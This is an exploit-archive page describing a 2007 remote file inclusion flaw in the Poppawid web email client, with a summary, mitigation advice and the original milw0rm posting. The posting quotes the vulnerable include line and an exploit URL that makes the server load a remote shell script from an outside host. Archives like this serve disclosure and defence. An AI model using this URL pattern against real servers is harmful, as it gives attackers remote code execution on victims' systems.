header-logo
Suggest Exploit
vendor:
Poppawid web-based email client
by:
0in
N/A
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Poppawid web-based email client
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Poppawid Remote File include

The vulnerability exists in the 'childwindow.inc.php' file of the Poppawid web-based email client. It allows an attacker to include arbitrary files from remote servers by manipulating the 'form' parameter in the URL. This can lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update Poppawid to a patched version that fixes the remote file inclusion vulnerability. Additionally, the 'register_globals' setting should be turned off.
Source

Exploit-DB raw data:

#Poppawid Remote File include
#f0und bY 0in
#Greetings to: All Dark-Coders Team Members
#IRC: #dark-coders at warszawa.irc.pl
#About:popper_mod-wid is a free (and popular), full featured web based email client
#Download:http://poppawid.sourceforge.net/
#No dork for script kiddies..;]
#Register_globals=On
#BUG:
poppawid/mail/childwindow.inc.php:33:                                   <?php include($form.".form.inc.php");?>
Expl0it:
http://x.com/[path]/mail/childwindow.inc.php?form=http://h4x0r.org/shell.txt?

# milw0rm.com [2007-10-02]

Navigation

Suggest Exploit

Services By CQR